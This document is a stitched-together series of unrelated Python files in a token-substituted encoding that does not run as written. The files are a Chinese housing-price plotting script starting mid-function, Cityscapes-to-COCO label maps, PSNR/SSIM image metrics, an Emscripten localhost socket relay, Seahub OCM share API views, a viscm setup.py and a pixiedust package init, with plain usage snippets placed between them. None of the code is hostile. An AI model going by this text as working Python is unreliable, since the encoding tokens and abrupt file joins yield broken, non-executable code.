res['volume'])<line_sep>ax1.legend(['30日成交量'] prop=font)<line_sep>resetXticks(ax1 res)<line_sep>plt.xticks(rotation=90)<line_sep>dir_name=os.path.join('fig' city)<if_stmt><not>os.path.exists(dir_name)<block_start>os.makedirs(dir_name)<block_end>plt.tight_layout()<line_sep>plt.savefig(os.path.join(dir_name title+'.png'))<line_sep>#plt.show() plt.close()<line_sep>res.to_excel('data/trend/%s-%s.xlsx'%(city title))<line_sep><return>res<block_end><def_stmt>plot_district df city district='朝阳' ma_length=-1 start_date=<none><block_start><if_stmt>district<eq>'静安'<block_start>gp=df.loc[df['下辖区'].isin(set(['静安' '闸北']))].groupby(['成交时间'])<block_end><else_stmt><block_start>gp=df.loc[df['下辖区']<eq>district].groupby(['成交时间'])<block_end>res=pd.DataFrame({'volume':gp.size() 'mean_price':gp['成交价(元/平)'].mean() 'median_price':gp['成交价(元/平)'].median()})<line_sep>res=res.iloc[:len(res) :]<line_sep>title=district<line_sep><return>plot(res city title MA ma_length start_date <false> <true>)<block_end><def_stmt>plot_df df city title MA ma_length start_date=<none> force=<false><block_start>gp=df.groupby(['成交时间'])['成交价(元/平)']<line_sep>res=pd.DataFrame({"volume":gp.size() "median_price":gp.median() "mean_price":gp.mean()})<line_sep>res=res.iloc[:len(res) :]<line_sep>plot(res city title MA ma_length start_date force)<block_end><def_stmt>plot_dfs dfs title legends ma_length=30 start_date=<none><block_start>ress=[]<for_stmt>df dfs<block_start>gp=df.groupby(['成交时间'])['成交价(元/平)']<line_sep>res=pd.DataFrame({"volume":gp.size() "median_price":gp.median() "mean_price":gp.mean()})<line_sep>res=res.iloc[:len(res) :]<if_stmt>len(res)<l>10+ma_length<block_start><return><block_end><if_stmt>ma_length<ne>-1<block_start>res=get_moving_average(res ma_length)<block_end><if_stmt>start_date<is><not><none><block_start>res=res.loc[res.index<ge>start_date :]<block_end>ress.append(res)<block_end>plt.rcParams['font.sans-serif']=['SimHei']<line_sep>matplotlib.rc('font' size=18)<line_sep>matplotlib.rcParams['figure.figsize']=[15 10]<line_sep>index=ress[0].index<for_stmt>res ress<block_start>res=res.loc[res.index.isin(index)]<line_sep>plt.plot(res['mean_price']/res['mean_price'].iloc[0])<block_end>plt.legend(legends prop=font)<line_sep>plt.title(title 
fontproperties=font)<line_sep>ax0=plt.gca()<line_sep>xticks=ax0.xaxis.get_major_ticks()<line_sep>interval=len(xticks)<floordiv>10<line_sep>ax0.set_xticks(ax0.get_xticks()[::interval])<line_sep>plt.xticks(rotation=30)<line_sep>plt.grid(<true>)<line_sep>dir_name=os.path.join('fig' city)<if_stmt><not>os.path.exists(dir_name)<block_start>os.makedirs(dir_name)<block_end>plt.savefig(os.path.join(dir_name title+'.png'))<line_sep>plt.show()<line_sep>plt.close()<block_end><def_stmt>render_mpl_table data filename col_width=3.0 row_height=1 font_size=24 header_color='#40466e' row_colors=['#f1f1f2' 'w'] edge_color='w' bbox=[0 0 1 1] header_columns=0 ax=<none> **kwargs<block_start>matplotlib.rcParams['font.sans-serif']="Songti SC"<line_sep>matplotlib.rcParams['font.family']="sans-serif"<if_stmt>ax<is><none><block_start>size=(np.array(data.shape[::-1])+np.array([0 6]))<times>np.array([col_width row_height])<line_sep>matplotlib.rcParams['figure.figsize']=size<line_sep>gs=gridspec.GridSpec(2 1 height_ratios=[4 1])<line_sep>ax=plt.subplot(gs[0])<line_sep>ax2=plt.subplot(gs[1])<line_sep>ax.axis('off')<block_end>mpl_table=ax.table(cellText=data.values bbox=bbox colLabels=data.columns **kwargs)<line_sep>mpl_table.auto_set_font_size(<false>)<line_sep>mpl_table.set_fontsize(font_size)<for_stmt>k,cell six.iteritems(mpl_table._cells)<block_start>cell.set_edgecolor(edge_color)<if_stmt>k[0]<eq>0<or>k[1]<l>header_columns<block_start>cell.set_text_props(weight='bold' color='w')<line_sep>cell.set_facecolor(header_color)<block_end><else_stmt><block_start>cell.set_facecolor(row_colors[k[0]%len(row_colors)])<block_end><block_end>qrcode=mpimg.imread('wechatqrcode.png')<line_sep>imagebox=OffsetImage(qrcode zoom=0.8)<line_sep>ab=AnnotationBbox(imagebox (0.1 0.5))<line_sep>ax2.axis("off")<line_sep>ax2.add_artist(ab)<line_sep>ax2.text(0.3 0.5 "欢迎扫码关注微信公众号\"时炜观察\"\n获取房价走势图以及在量化投资行业的知识见识分享。\n更有多家低佣A股证券开户。" dict(size=30))<line_sep>plt.tight_layout()<line_sep>plt.savefig(filename)<line_sep><return>ax<block_end><def_stmt>updateCityTable <block_start>df=pd.read_excel('rank/城市排名.xlsx')<line_sep>ax=render_mpl_table(df 'fig/city_table.png' header_columns=0 col_width=2.0)<block_end><def_stmt>updateAllTableImage <block_start>df=pd.read_excel('rank/城市排名.xlsx')<line_sep>render_mpl_table(df 'fig/allcity/table.png' header_columns=0 col_width=2.0)<for_stmt>city df['城市']<block_start>filename='rank/%s区域排名.xlsx'%city<line_sep>imgfilename='fig/%s/table.png'%city<line_sep>data=pd.read_excel(filename)<line_sep>render_mpl_table(data imgfilename header_columns=0 col_width=2.0)<block_end><block_end>
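# A small sketch of the input get_moving_average() expects: a frame indexed by 'YYYY-MM-DD'
# strings with 'volume', 'median_price' and 'mean_price' columns, as produced by the groupby
# calls above. The numbers here are synthetic.
import numpy as np
import pandas as pd

dates = [str(d.date()) for d in pd.date_range('2021-01-01', periods=40)]
daily = pd.DataFrame({
    'volume': np.random.randint(1, 5, size=40),
    'median_price': np.random.uniform(49000, 51000, size=40),
    'mean_price': np.random.uniform(49000, 51000, size=40),
}, index=dates)

smoothed = get_moving_average(daily, ma_length=10)   # 10-day volume-weighted averages
print(smoothed.tail())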
# Copyright (c) 2017-present, Facebook, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################## # mapping coco categories to cityscapes (our converted json) id # cityscapes # INFO roidb.py: 220: 1 bicycle: 7286 # INFO roidb.py: 220: 2 car: 53684 # INFO roidb.py: 220: 3 person: 35704 # INFO roidb.py: 220: 4 train: 336 # INFO roidb.py: 220: 5 truck: 964 # INFO roidb.py: 220: 6 motorcycle: 1468 # INFO roidb.py: 220: 7 bus: 758 # INFO roidb.py: 220: 8 rider: 3504 # coco (val5k) # INFO roidb.py: 220: 1 person: 21296 # INFO roidb.py: 220: 2 bicycle: 628 # INFO roidb.py: 220: 3 car: 3818 # INFO roidb.py: 220: 4 motorcycle: 732 # INFO roidb.py: 220: 5 airplane: 286 <------ irrelevant # INFO roidb.py: 220: 6 bus: 564 # INFO roidb.py: 220: 7 train: 380 # INFO roidb.py: 220: 8 truck: 828 <def_stmt>cityscapes_to_coco cityscapes_id<block_start>lookup={0:0 # ... background 1:2 # bicycle 2:3 # car 3:1 # person 4:7 # train 5:8 # truck 6:4 # motorcycle 7:6 # bus 8:-1 # rider (-1 means rand init) }<line_sep><return>lookup[cityscapes_id]<block_end><def_stmt>cityscapes_to_coco_with_rider cityscapes_id<block_start>lookup={0:0 # ... background 1:2 # bicycle 2:3 # car 3:1 # person 4:7 # train 5:8 # truck 6:4 # motorcycle 7:6 # bus 8:1 # rider ("person", *rider has human right!*) }<line_sep><return>lookup[cityscapes_id]<block_end><def_stmt>cityscapes_to_coco_without_person_rider cityscapes_id<block_start>lookup={0:0 # ... background 1:2 # bicycle 2:3 # car 3:-1 # person (ignore) 4:7 # train 5:8 # truck 6:4 # motorcycle 7:6 # bus 8:-1 # rider (ignore) }<line_sep><return>lookup[cityscapes_id]<block_end><def_stmt>cityscapes_to_coco_all_random cityscapes_id<block_start>lookup={0:-1 # ... background 1:-1 # bicycle 2:-1 # car 3:-1 # person (ignore) 4:-1 # train 5:-1 # truck 6:-1 # motorcycle 7:-1 # bus 8:-1 # rider (ignore) }<line_sep><return>lookup[cityscapes_id]<block_end>
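# A quick example of applying one of the lookups above to a list of cityscapes category ids;
# per the comments, a value of -1 means "rand init", i.e. no corresponding COCO class is used.
cityscapes_ids = [1, 3, 8]                                   # bicycle, person, rider
coco_ids = [cityscapes_to_coco_with_rider(i) for i in cityscapes_ids]
print(coco_ids)                                              # [2, 1, 1] -- rider maps to "person"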
# ------------------------------------------------------------------------ # Copyright (c) 2021 megvii-model. All Rights Reserved. # ------------------------------------------------------------------------ # Modified from BasicSR (https://github.com/xinntao/BasicSR) # Copyright 2018-2020 BasicSR Authors # ------------------------------------------------------------------------ <import_stmt>cv2<import_stmt>numpy<as>np<import_from_stmt>basicsr.metrics.metric_util reorder_image to_y_channel<import_stmt>skimage.metrics<import_stmt>torch<def_stmt>calculate_psnr img1 img2 crop_border input_order='HWC' test_y_channel=<false><block_start>"""Calculate PSNR (Peak Signal-to-Noise Ratio). Ref: https://en.wikipedia.org/wiki/Peak_signal-to-noise_ratio Args: img1 (ndarray/tensor): Images with range [0, 255]/[0, 1]. img2 (ndarray/tensor): Images with range [0, 255]/[0, 1]. crop_border (int): Cropped pixels in each edge of an image. These pixels are not involved in the PSNR calculation. input_order (str): Whether the input order is 'HWC' or 'CHW'. Default: 'HWC'. test_y_channel (bool): Test on Y channel of YCbCr. Default: False. Returns: float: psnr result. """<assert_stmt>img1.shape<eq>img2.shape (f'Image shapes are differnet: {img1.shape}, {img2.shape}.')<if_stmt>input_order<not><in>['HWC' 'CHW']<block_start><raise>ValueError(f'Wrong input_order {input_order}. Supported input_orders are '<concat>'"HWC" and "CHW"')<block_end><if_stmt>type(img1)<eq>torch.Tensor<block_start><if_stmt>len(img1.shape)<eq>4<block_start>img1=img1.squeeze(0)<block_end>img1=img1.detach().cpu().numpy().transpose(1 2 0)<block_end><if_stmt>type(img2)<eq>torch.Tensor<block_start><if_stmt>len(img2.shape)<eq>4<block_start>img2=img2.squeeze(0)<block_end>img2=img2.detach().cpu().numpy().transpose(1 2 0)<block_end>img1=reorder_image(img1 input_order=input_order)<line_sep>img2=reorder_image(img2 input_order=input_order)<line_sep>img1=img1.astype(np.float64)<line_sep>img2=img2.astype(np.float64)<if_stmt>crop_border<ne>0<block_start>img1=img1[crop_border:-crop_border crop_border:-crop_border <ellipsis>]<line_sep>img2=img2[crop_border:-crop_border crop_border:-crop_border <ellipsis>]<block_end><if_stmt>test_y_channel<block_start>img1=to_y_channel(img1)<line_sep>img2=to_y_channel(img2)<block_end>mse=np.mean((img1-img2)<power>2)<if_stmt>mse<eq>0<block_start><return>float('inf')<block_end>max_value=1.<if>img1.max()<le>1<else>255.<line_sep><return>20.<times>np.log10(max_value/np.sqrt(mse))<block_end><def_stmt>_ssim img1 img2<block_start>"""Calculate SSIM (structural similarity) for one channel images. It is called by func:`calculate_ssim`. Args: img1 (ndarray): Images with range [0, 255] with order 'HWC'. img2 (ndarray): Images with range [0, 255] with order 'HWC'. Returns: float: ssim result. 
"""<line_sep>C1=(0.01<times>255)<power>2<line_sep>C2=(0.03<times>255)<power>2<line_sep>img1=img1.astype(np.float64)<line_sep>img2=img2.astype(np.float64)<line_sep>kernel=cv2.getGaussianKernel(11 1.5)<line_sep>window=np.outer(kernel kernel.transpose())<line_sep>mu1=cv2.filter2D(img1 -1 window)[5:-5 5:-5]<line_sep>mu2=cv2.filter2D(img2 -1 window)[5:-5 5:-5]<line_sep>mu1_sq=mu1<power>2<line_sep>mu2_sq=mu2<power>2<line_sep>mu1_mu2=mu1<times>mu2<line_sep>sigma1_sq=cv2.filter2D(img1<power>2 -1 window)[5:-5 5:-5]-mu1_sq<line_sep>sigma2_sq=cv2.filter2D(img2<power>2 -1 window)[5:-5 5:-5]-mu2_sq<line_sep>sigma12=cv2.filter2D(img1<times>img2 -1 window)[5:-5 5:-5]-mu1_mu2<line_sep>ssim_map=((2<times>mu1_mu2+C1)<times>(2<times>sigma12+C2))/((mu1_sq+mu2_sq+C1)<times>(sigma1_sq+sigma2_sq+C2))<line_sep><return>ssim_map.mean()<block_end><def_stmt>prepare_for_ssim img k<block_start><import_stmt>torch<with_stmt>torch.no_grad()<block_start>img=torch.from_numpy(img).unsqueeze(0).unsqueeze(0).float()<line_sep>conv=torch.nn.Conv2d(1 1 k stride=1 padding=k<floordiv>2 padding_mode='reflect')<line_sep>conv.weight.requires_grad=<false><line_sep>conv.weight[: : : :]=1./(k<times>k)<line_sep>img=conv(img)<line_sep>img=img.squeeze(0).squeeze(0)<line_sep>img=img[0::k 0::k]<block_end><return>img.detach().cpu().numpy()<block_end><def_stmt>prepare_for_ssim_rgb img k<block_start><import_stmt>torch<with_stmt>torch.no_grad()<block_start>img=torch.from_numpy(img).float()#HxWx3 conv=torch.nn.Conv2d(1 1 k stride=1 padding=k<floordiv>2 padding_mode='reflect')<line_sep>conv.weight.requires_grad=<false><line_sep>conv.weight[: : : :]=1./(k<times>k)<line_sep>new_img=[]<for_stmt>i range(3)<block_start>new_img.append(conv(img[: : i].unsqueeze(0).unsqueeze(0)).squeeze(0).squeeze(0)[0::k 0::k])<block_end><block_end><return>torch.stack(new_img dim=2).detach().cpu().numpy()<block_end><def_stmt>_3d_gaussian_calculator img conv3d<block_start>out=conv3d(img.unsqueeze(0).unsqueeze(0)).squeeze(0).squeeze(0)<line_sep><return>out<block_end><def_stmt>_generate_3d_gaussian_kernel <block_start>kernel=cv2.getGaussianKernel(11 1.5)<line_sep>window=np.outer(kernel kernel.transpose())<line_sep>kernel_3=cv2.getGaussianKernel(11 1.5)<line_sep>kernel=torch.tensor(np.stack([window<times>k<for>k kernel_3] axis=0))<line_sep>conv3d=torch.nn.Conv3d(1 1 (11 11 11) stride=1 padding=(5 5 5) bias=<false> padding_mode='replicate')<line_sep>conv3d.weight.requires_grad=<false><line_sep>conv3d.weight[0 0 : : :]=kernel<line_sep><return>conv3d<block_end><def_stmt>_ssim_3d img1 img2 max_value<block_start><assert_stmt>len(img1.shape)<eq>3<and>len(img2.shape)<eq>3<line_sep>"""Calculate SSIM (structural similarity) for one channel images. It is called by func:`calculate_ssim`. Args: img1 (ndarray): Images with range [0, 255]/[0, 1] with order 'HWC'. img2 (ndarray): Images with range [0, 255]/[0, 1] with order 'HWC'. Returns: float: ssim result. 
"""<line_sep>C1=(0.01<times>max_value)<power>2<line_sep>C2=(0.03<times>max_value)<power>2<line_sep>img1=img1.astype(np.float64)<line_sep>img2=img2.astype(np.float64)<line_sep>kernel=_generate_3d_gaussian_kernel().cuda()<line_sep>img1=torch.tensor(img1).float().cuda()<line_sep>img2=torch.tensor(img2).float().cuda()<line_sep>mu1=_3d_gaussian_calculator(img1 kernel)<line_sep>mu2=_3d_gaussian_calculator(img2 kernel)<line_sep>mu1_sq=mu1<power>2<line_sep>mu2_sq=mu2<power>2<line_sep>mu1_mu2=mu1<times>mu2<line_sep>sigma1_sq=_3d_gaussian_calculator(img1<power>2 kernel)-mu1_sq<line_sep>sigma2_sq=_3d_gaussian_calculator(img2<power>2 kernel)-mu2_sq<line_sep>sigma12=_3d_gaussian_calculator(img1<times>img2 kernel)-mu1_mu2<line_sep>ssim_map=((2<times>mu1_mu2+C1)<times>(2<times>sigma12+C2))/((mu1_sq+mu2_sq+C1)<times>(sigma1_sq+sigma2_sq+C2))<line_sep><return>float(ssim_map.mean())<block_end><def_stmt>_ssim_cly img1 img2<block_start><assert_stmt>len(img1.shape)<eq>2<and>len(img2.shape)<eq>2<line_sep>"""Calculate SSIM (structural similarity) for one channel images. It is called by func:`calculate_ssim`. Args: img1 (ndarray): Images with range [0, 255] with order 'HWC'. img2 (ndarray): Images with range [0, 255] with order 'HWC'. Returns: float: ssim result. """<line_sep>C1=(0.01<times>255)<power>2<line_sep>C2=(0.03<times>255)<power>2<line_sep>img1=img1.astype(np.float64)<line_sep>img2=img2.astype(np.float64)<line_sep>kernel=cv2.getGaussianKernel(11 1.5)<line_sep># print(kernel) window=np.outer(kernel kernel.transpose())<line_sep>bt=cv2.BORDER_REPLICATE<line_sep>mu1=cv2.filter2D(img1 -1 window borderType=bt)<line_sep>mu2=cv2.filter2D(img2 -1 window borderType=bt)<line_sep>mu1_sq=mu1<power>2<line_sep>mu2_sq=mu2<power>2<line_sep>mu1_mu2=mu1<times>mu2<line_sep>sigma1_sq=cv2.filter2D(img1<power>2 -1 window borderType=bt)-mu1_sq<line_sep>sigma2_sq=cv2.filter2D(img2<power>2 -1 window borderType=bt)-mu2_sq<line_sep>sigma12=cv2.filter2D(img1<times>img2 -1 window borderType=bt)-mu1_mu2<line_sep>ssim_map=((2<times>mu1_mu2+C1)<times>(2<times>sigma12+C2))/((mu1_sq+mu2_sq+C1)<times>(sigma1_sq+sigma2_sq+C2))<line_sep><return>ssim_map.mean()<block_end><def_stmt>calculate_ssim img1 img2 crop_border input_order='HWC' test_y_channel=<false><block_start>"""Calculate SSIM (structural similarity). Ref: Image quality assessment: From error visibility to structural similarity The results are the same as that of the official released MATLAB code in https://ece.uwaterloo.ca/~z70wang/research/ssim/. For three-channel images, SSIM is calculated for each channel and then averaged. Args: img1 (ndarray): Images with range [0, 255]. img2 (ndarray): Images with range [0, 255]. crop_border (int): Cropped pixels in each edge of an image. These pixels are not involved in the SSIM calculation. input_order (str): Whether the input order is 'HWC' or 'CHW'. Default: 'HWC'. test_y_channel (bool): Test on Y channel of YCbCr. Default: False. Returns: float: ssim result. """<assert_stmt>img1.shape<eq>img2.shape (f'Image shapes are differnet: {img1.shape}, {img2.shape}.')<if_stmt>input_order<not><in>['HWC' 'CHW']<block_start><raise>ValueError(f'Wrong input_order {input_order}. 
Supported input_orders are '<concat>'"HWC" and "CHW"')<block_end><if_stmt>type(img1)<eq>torch.Tensor<block_start><if_stmt>len(img1.shape)<eq>4<block_start>img1=img1.squeeze(0)<block_end>img1=img1.detach().cpu().numpy().transpose(1 2 0)<block_end><if_stmt>type(img2)<eq>torch.Tensor<block_start><if_stmt>len(img2.shape)<eq>4<block_start>img2=img2.squeeze(0)<block_end>img2=img2.detach().cpu().numpy().transpose(1 2 0)<block_end>img1=reorder_image(img1 input_order=input_order)<line_sep>img2=reorder_image(img2 input_order=input_order)<line_sep>img1=img1.astype(np.float64)<line_sep>img2=img2.astype(np.float64)<if_stmt>crop_border<ne>0<block_start>img1=img1[crop_border:-crop_border crop_border:-crop_border <ellipsis>]<line_sep>img2=img2[crop_border:-crop_border crop_border:-crop_border <ellipsis>]<block_end><if_stmt>test_y_channel<block_start>img1=to_y_channel(img1)<line_sep>img2=to_y_channel(img2)<line_sep><return>_ssim_cly(img1[<ellipsis> 0] img2[<ellipsis> 0])<block_end>ssims=[]<line_sep># ssims_before = [] # skimage_before = skimage.metrics.structural_similarity(img1, img2, data_range=255., multichannel=True) # print('.._skimage', # skimage.metrics.structural_similarity(img1, img2, data_range=255., multichannel=True)) max_value=1<if>img1.max()<le>1<else>255<with_stmt>torch.no_grad()<block_start>final_ssim=_ssim_3d(img1 img2 max_value)<line_sep>ssims.append(final_ssim)<block_end># for i in range(img1.shape[2]): # ssims_before.append(_ssim(img1, img2)) # print('..ssim mean , new {:.4f} and before {:.4f} .... skimage before {:.4f}'.format(np.array(ssims).mean(), np.array(ssims_before).mean(), skimage_before)) # ssims.append(skimage.metrics.structural_similarity(img1[..., i], img2[..., i], multichannel=False)) <return>np.array(ssims).mean()<block_end>
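# A usage sketch for the two metrics above on synthetic images. Note that the three-channel
# SSIM path (_ssim_3d) moves its Gaussian filtering to the GPU via .cuda(), so on a CPU-only
# machine the test_y_channel=True path is the safe one.
import numpy as np

img1 = np.random.randint(0, 256, (128, 128, 3)).astype(np.float64)
img2 = np.clip(img1 + 5.0 * np.random.randn(128, 128, 3), 0, 255)

print('PSNR:', calculate_psnr(img1, img2, crop_border=4))
print('SSIM (Y):', calculate_ssim(img1, img2, crop_border=4, test_y_channel=True))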
# Copyright 2013 The Emscripten Authors. All rights reserved. # Emscripten is available under two separate licenses, the MIT license and the # University of Illinois/NCSA Open Source License. Both these licenses can be # found in the LICENSE file. """Listens on 2 ports and relays between them. Listens to ports A and B. When someone connects to port A, and then sends some data to port A, that data is sent to someone who connected to socket B. And so forth. This is different than say socat which will listen to one port and then make a connection to another port, and do bidirectional communication. We need to actually listen on both ports. """<import_stmt>sys<import_stmt>socket<import_stmt>time<import_stmt>threading<line_sep>ports=[int(sys.argv[1]) int(sys.argv[2])]<class_stmt>Listener(threading.Thread)<block_start><def_stmt>run self<block_start>self.conn=<none><line_sep>s=socket.socket(socket.AF_INET socket.SOCK_STREAM)<line_sep><global>ports<line_sep>port=ports[0]<line_sep>ports=ports[1:]<line_sep>print('listener binding to ' port)<line_sep>s.bind(('127.0.0.1' port))<line_sep>s.listen(1)<line_sep>print('listener' port 'waiting for connection')<line_sep>conn,addr=s.accept()<line_sep>self.conn=conn<while_stmt><true><block_start>time.sleep(0.5)<line_sep>print('listener' port 'waiting for data')<line_sep>data=conn.recv(20<times>1024)<if_stmt><not>data<block_start><continue><block_end><while_stmt><not>self.other.conn<block_start>print('listener' port 'waiting for other connection in order to send data')<line_sep>time.sleep(1)<block_end>print('listener' port 'sending data' len(data))<line_sep>self.other.conn.send(data)<block_end><block_end><block_end>in_listener=Listener()<line_sep>in_listener.daemon=<true><line_sep>in_listener.start()<line_sep>out_listener=Listener()<line_sep>out_listener.daemon=<true><line_sep>out_listener.start()<line_sep>in_listener.other=out_listener<line_sep>out_listener.other=in_listener<while_stmt><true><block_start>time.sleep(1)<block_end>
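# A usage sketch for the relay above, driven from another process; the script name and port
# numbers are placeholders. Whatever is written to the first port is forwarded to the client
# connected to the second port (and vice versa).
#
#   $ python socket_relay.py 8990 8991
#
import socket

a = socket.create_connection(('127.0.0.1', 8990))
b = socket.create_connection(('127.0.0.1', 8991))
a.sendall(b'hello through the relay')
print(b.recv(1024))   # b'hello through the relay', after the relay's polling delay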
<import_stmt>logging<import_stmt>requests<import_stmt>json<import_from_stmt>rest_framework status<import_from_stmt>rest_framework.authentication SessionAuthentication<import_from_stmt>rest_framework.permissions IsAuthenticated<import_from_stmt>rest_framework.response Response<import_from_stmt>rest_framework.views APIView<import_from_stmt>seahub.api2.authentication TokenAuthentication<import_from_stmt>seahub.api2.throttling UserRateThrottle<import_from_stmt>seahub.api2.utils api_error<import_from_stmt>seahub.ocm.models OCMShareReceived<import_from_stmt>seahub.ocm.settings VIA_REPO_TOKEN_URL<import_from_stmt>seahub.constants PERMISSION_READ_WRITE<line_sep>logger=logging.getLogger(__name__)<def_stmt>send_get_request url params=<none> headers=<none><block_start>response=requests.get(url params=params headers=headers)<line_sep><return>json.loads(response.text)<block_end><class_stmt>OCMReposDirView(APIView)<block_start>authentication_classes=(TokenAuthentication SessionAuthentication)<line_sep>permission_classes=(IsAuthenticated )<line_sep>throttle_classes=(UserRateThrottle )<def_stmt>get self request provider_id repo_id<block_start>""" Send request to Provider to get repo item list """<line_sep>path=request.GET.get('path' '/')<line_sep>with_thumbnail=request.GET.get('with_thumbnail' 'false')<if_stmt>with_thumbnail<not><in>('true' 'false')<block_start>error_msg='with_thumbnail invalid.'<line_sep><return>api_error(status.HTTP_400_BAD_REQUEST error_msg)<block_end>ocm_share_received=OCMShareReceived.objects.filter(provider_id=provider_id repo_id=repo_id).first()<if_stmt><not>ocm_share_received<block_start>error_msg='Library %s not found.'%repo_id<line_sep><return>api_error(status.HTTP_404_NOT_FOUND error_msg)<block_end><if_stmt>ocm_share_received.to_user<ne>request.user.username<block_start>error_msg='permission denied.'<line_sep><return>api_error(status.HTTP_403_FORBIDDEN error_msg)<block_end>url=ocm_share_received.from_server_url+VIA_REPO_TOKEN_URL['DIR']<line_sep>params={'path':path 'with_thumbnail':with_thumbnail }<line_sep>headers={'Authorization':'token '+ocm_share_received.shared_secret}<try_stmt><block_start>resp=send_get_request(url params=params headers=headers)<block_end><except_stmt>Exception<as>e<block_start>logging.error(e)<line_sep><return>api_error(status.HTTP_500_INTERNAL_SERVER_ERROR 'Internal Server Error')<block_end><return>Response(resp)<block_end><block_end><class_stmt>OCMReposDownloadLinkView(APIView)<block_start>authentication_classes=(TokenAuthentication SessionAuthentication)<line_sep>permission_classes=(IsAuthenticated )<line_sep>throttle_classes=(UserRateThrottle )<def_stmt>get self request provider_id repo_id<block_start>""" Send request to Provider to get download link """<line_sep>path=request.GET.get('path' '/')<line_sep>ocm_share_received=OCMShareReceived.objects.filter(provider_id=provider_id repo_id=repo_id).first()<if_stmt><not>ocm_share_received<block_start>error_msg='Library %s not found.'%repo_id<line_sep><return>api_error(status.HTTP_404_NOT_FOUND error_msg)<block_end><if_stmt>ocm_share_received.to_user<ne>request.user.username<block_start>error_msg='permission denied.'<line_sep><return>api_error(status.HTTP_403_FORBIDDEN error_msg)<block_end>url=ocm_share_received.from_server_url+VIA_REPO_TOKEN_URL['DOWNLOAD_LINK']<line_sep>params={'path':path }<line_sep>headers={'Authorization':'token '+ocm_share_received.shared_secret}<try_stmt><block_start>resp=send_get_request(url params=params 
headers=headers)<block_end><except_stmt>Exception<as>e<block_start>logging.error(e)<line_sep><return>api_error(status.HTTP_500_INTERNAL_SERVER_ERROR 'Internal Server Error')<block_end><return>Response(resp)<block_end><block_end><class_stmt>OCMReposUploadLinkView(APIView)<block_start>authentication_classes=(TokenAuthentication SessionAuthentication)<line_sep>permission_classes=(IsAuthenticated )<line_sep>throttle_classes=(UserRateThrottle )<def_stmt>get self request provider_id repo_id<block_start>""" Send request to Provider to get upload link """<line_sep>path=request.GET.get('path' '/')<line_sep>ocm_share_received=OCMShareReceived.objects.filter(provider_id=provider_id repo_id=repo_id).first()<if_stmt><not>ocm_share_received<block_start>error_msg='Library %s not found.'%repo_id<line_sep><return>api_error(status.HTTP_404_NOT_FOUND error_msg)<block_end><if_stmt>ocm_share_received.to_user<ne>request.user.username<block_start>error_msg='permission denied.'<line_sep><return>api_error(status.HTTP_403_FORBIDDEN error_msg)<block_end><if_stmt>ocm_share_received.permission<ne>PERMISSION_READ_WRITE<block_start>error_msg='permission denied.'<line_sep><return>api_error(status.HTTP_403_FORBIDDEN error_msg)<block_end>url=ocm_share_received.from_server_url+VIA_REPO_TOKEN_URL['UPLOAD_LINK']<line_sep>params={'path':path 'from':'web' }<line_sep>headers={'Authorization':'token '+ocm_share_received.shared_secret}<try_stmt><block_start>resp=send_get_request(url params=params headers=headers)<block_end><except_stmt>Exception<as>e<block_start>logging.error(e)<line_sep><return>api_error(status.HTTP_500_INTERNAL_SERVER_ERROR 'Internal Server Error')<block_end><return>Response(resp)<block_end><block_end>
<import_from_stmt>setuptools setup find_packages<import_stmt>sys<import_stmt>os.path<import_stmt>numpy<as>np<line_sep># Must be one line or PyPI will cut it off DESC=("A colormap tool")<line_sep>LONG_DESC=open("README.rst").read()<line_sep>setup(name="viscm" version="0.9" description=DESC long_description=LONG_DESC author="<NAME>, <NAME>" author_email="<EMAIL>, <EMAIL>" url="https://github.com/bids/viscm" license="MIT" classifiers=["Development Status :: 3 - Alpha" "Intended Audience :: Developers" "Intended Audience :: Science/Research" "License :: OSI Approved :: MIT License" "Programming Language :: Python :: 2" "Programming Language :: Python :: 3" ] packages=find_packages() install_requires=["numpy" "matplotlib" "colorspacious"] package_data={'viscm':['examples/*']} )<line_sep>
# ------------------------------------------------------------------------------- # Copyright IBM Corp. 2017 # # Licensed under the Apache License, Version 2.0 (the 'License'); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ------------------------------------------------------------------------------- __all__=['packageManager' 'display' 'services' 'utils']<import_stmt>warnings<with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore")<try_stmt>#Check if we have an python shell available, if not, use our ProxyShell <block_start>get_ipython()<block_end><except_stmt>NameError<block_start><import_from_stmt>.proxyShell ProxyInteractiveShell<line_sep>ProxyInteractiveShell.instance()<block_end>#shortcut to logging <import_stmt>pixiedust.utils.pdLogging<as>pdLogging<line_sep>logger=pdLogging.getPixiedustLogger()<line_sep>getLogger=pdLogging.getLogger<import_from_stmt>pixiedust.utils.environment Environment<if_stmt>Environment.hasSpark#shortcut to packageManager <block_start><import_stmt>pixiedust.packageManager<as>packageManager<line_sep>printAllPackages=packageManager.printAllPackages<line_sep>installPackage=packageManager.installPackage<line_sep>uninstallPackage=packageManager.uninstallPackage<try_stmt><block_start><import_from_stmt>py4j.protocol Py4JJavaError<line_sep>#javaBridge and scalaBridge only work in the driver, not an executor <import_from_stmt>pixiedust.utils.javaBridge *<import_from_stmt>pixiedust.utils.scalaBridge *<line_sep>#shortcut to Spark job monitoring <import_from_stmt>pixiedust.utils.sparkJobProgressMonitor enableSparkJobProgressMonitor<line_sep>enableJobMonitor=enableSparkJobProgressMonitor<block_end><except_stmt>(NameError Py4JJavaError)#IPython not available we must be in a spark executor <block_start><pass><block_end><block_end>#automated import into the user namespace <try_stmt><block_start><import_from_stmt>IPython.core.getipython get_ipython<import_from_stmt>pixiedust.display display<import_stmt>pixiedust.services<if_stmt>"display"<not><in>get_ipython().user_ns#be nice, only set the display variable on the user namespace if it's not already taken <block_start>get_ipython().user_ns["display"]=display<block_end><import_from_stmt>pixiedust.utils.sampleData sampleData<import_stmt>pixiedust.apps.debugger<import_from_stmt>pixiedust.utils checkVersion<import_from_stmt>pixiedust.utils.storage optOut optIn<line_sep>checkVersion()<block_end><except_stmt>(NameError)#IPython not available we must be in a spark executor <block_start><pass><block_end><block_end>
